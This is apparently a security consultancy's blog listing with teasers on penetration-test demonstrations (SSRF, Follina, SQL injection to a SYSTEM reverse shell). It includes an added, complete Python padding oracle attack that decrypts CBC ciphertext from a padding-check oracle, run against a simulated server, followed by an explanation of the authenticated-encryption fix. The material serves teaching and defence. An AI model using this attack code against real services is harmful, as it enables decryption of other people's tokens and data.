Winmill Wins 2022 Apex Program Contest Winmill is the winner of the 2022 Micro Focus Apex Program sales enablement competition, sponsored by Micro Focus and its distribution partner Arrow ECS, which began with a field of 15 contestants. Read More
Conducting Penetration Testing: 7 Steps Are you getting the most out of your pen testing program? Does your penetration testing services provider follow an execution standard for completeness and quality control? Winmill breaks out its pen testing services into the seven phases defined in the Penetration Testing Execution Standard (PTES). Read More
Is it Possible to Automate Penetration Testing? Is it a best practice to completely automate penetration testing? The short answer is "no." The defining feature of a pen test is a highly skilled human tester who chains findings, adapts to the target, and judges impact. A fully automated "penetration test," as the term is commonly used, is in practice a vulnerability assessment. Read More
Application Scan Identifies an SSRF Vulnerability; Penetration Test Finds Exploitation Attack Vectors In this demonstration we leverage a Server-Side Request Forgery (SSRF) vulnerability, then abuse the privileges of two user accounts to gain root access on the server. Read More
Padding Oracle Attack: Are You Vulnerable? In this demonstration, we mount a cryptographic attack known as a "padding oracle attack" against a web application that uses AES-CBC without authentication (no MAC or AEAD), so that the server's padding-error response leaks one bit per query about the plaintext. Read More
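As an added, self-contained illustration of the padding oracle attack teased above (example code, not code from Winmill's post): a server-side "oracle" that only reveals whether PKCS#7 padding was valid, and an attacker that recovers the full plaintext from that single bit, block by block, without ever seeing the key. To run on the standard library alone, a small SHA-256-keyed Feistel network stands in for AES; the attack never looks inside the block cipher, so the same code works unchanged against real AES-CBC. The key, IV and plaintext are constructed demo values.

```python
# Added example (not from the original post): padding oracle attack on unauthenticated CBC.
import hashlib

BLOCK = 16
ROUNDS = 8


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    # Feistel round function: keyed hash truncated to one 8-byte half-block.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[: BLOCK // 2]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    # Stand-in 128-bit block cipher (Feistel network); the attack does not depend on it.
    l, r = block[: BLOCK // 2], block[BLOCK // 2 :]
    for rnd in range(ROUNDS):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[: BLOCK // 2], block[BLOCK // 2 :]
    for rnd in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r


def pad(data: bytes) -> bytes:
    # PKCS#7: append 1..16 bytes, each holding the pad length.
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i : i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        cur = ct[i : i + BLOCK]
        out += _xor(block_decrypt(key, cur), prev)
        prev = cur
    return out


def make_oracle(key: bytes):
    """The vulnerable server: leaks exactly one bit, 'did the padding check pass?'."""
    def oracle(iv: bytes, ct: bytes) -> bool:
        try:
            unpad(cbc_decrypt(key, iv, ct))
            return True
        except ValueError:
            return False
    return oracle


def padding_oracle_attack(oracle, iv: bytes, ct: bytes) -> bytes:
    """Recover the padded plaintext using only oracle answers, never the key."""
    blocks = [iv] + [ct[i : i + BLOCK] for i in range(0, len(ct), BLOCK)]
    recovered = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D_k(cur), learned from the last byte backwards
        for j in range(BLOCK - 1, -1, -1):
            p = BLOCK - j  # pad value we try to force into positions j..15
            for g in range(256):
                forged = bytearray(BLOCK)
                forged[j] = g
                for k in range(j + 1, BLOCK):
                    forged[k] = inter[k] ^ p  # already-known bytes decrypt to p
                if not oracle(bytes(forged), cur):
                    continue
                if j == BLOCK - 1:
                    # Last byte: a hit may be 0x02 0x02 (or longer) rather than 0x01.
                    # Disturb byte 14; a true 0x01 stays valid, a false hit does not.
                    forged[j - 1] ^= 0xFF
                    if not oracle(bytes(forged), cur):
                        continue
                inter[j] = g ^ p
                break
            else:
                raise RuntimeError("oracle never accepted a guess for byte %d" % j)
        recovered += _xor(inter, prev)  # P_i = D_k(C_i) XOR C_{i-1}
    return recovered


# Constructed demo inputs (not from the original post).
KEY = b"winmill-demo-key"
IV = bytes(range(BLOCK))
PLAINTEXT = b"session=admin;exp=2099-01-01"


def run_demo(plaintext: bytes = PLAINTEXT) -> bytes:
    ct = cbc_encrypt(KEY, IV, pad(plaintext))
    return unpad(padding_oracle_attack(make_oracle(KEY), IV, ct))


if __name__ == "__main__":
    print(run_demo())
```

The attacker needs at most 256 oracle queries per plaintext byte and never touches the key; any observable difference between "bad padding" and "good padding" (an HTTP 500 versus 200, a different error string, or a timing gap) is enough. The fix is not a better padding check but authenticated encryption: encrypt-then-MAC with HMAC over IV and ciphertext, or an AEAD mode such as AES-GCM, with the MAC verified before any decryption or padding logic runs.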
Low-Tech Cyber Security Threat Hunting with Bash One of the many useful skills that I learned during my journey to become an Offensive Security Certified Professional was Bash scripting. In this blog, I will share how to use Bash one-liners to extract threat-hunting information from an Apache access.log after a suspected breach. Read More
Winmill Employee Wins Veracode Video Contest Winmill Software Corporation has announced that Ben DiMolfetta, client solutions architect for Winmill, has won Veracode’s “Best Video Series in Demonstrating Software Composition Analysis (SCA).” Read More
Cyber Security: Microsoft Office/Microsoft Support Diagnostic Tool "Follina" Vulnerability Cybersecurity researchers are calling attention to a zero-day flaw in the Microsoft Support Diagnostic Tool (MSDT), reachable from Microsoft Office documents, that could be abused to achieve arbitrary code execution on affected Windows systems. Read More
Penetration Testing: Windows Server 2016 Breached via Web Apps Penetration testers say that, given enough time and resources, any system can be hacked. In this demonstration, we attack a fully patched Windows Server 2016 host, with no known unpatched vulnerabilities, without using any exploits. Our entry point is an Outlook Web Access (OWA) application. Read More
Penetration Test: SYSTEM Access to MSSQL Server via SQL Injection and File Overwrite In this demonstration we exploit an MSSQL server during a penetration test: a series of SQL injections gives us unauthorized access to a web application, and we then leverage that access to overwrite a file and execute code, obtaining a reverse shell as SYSTEM on the target MSSQL server. Read More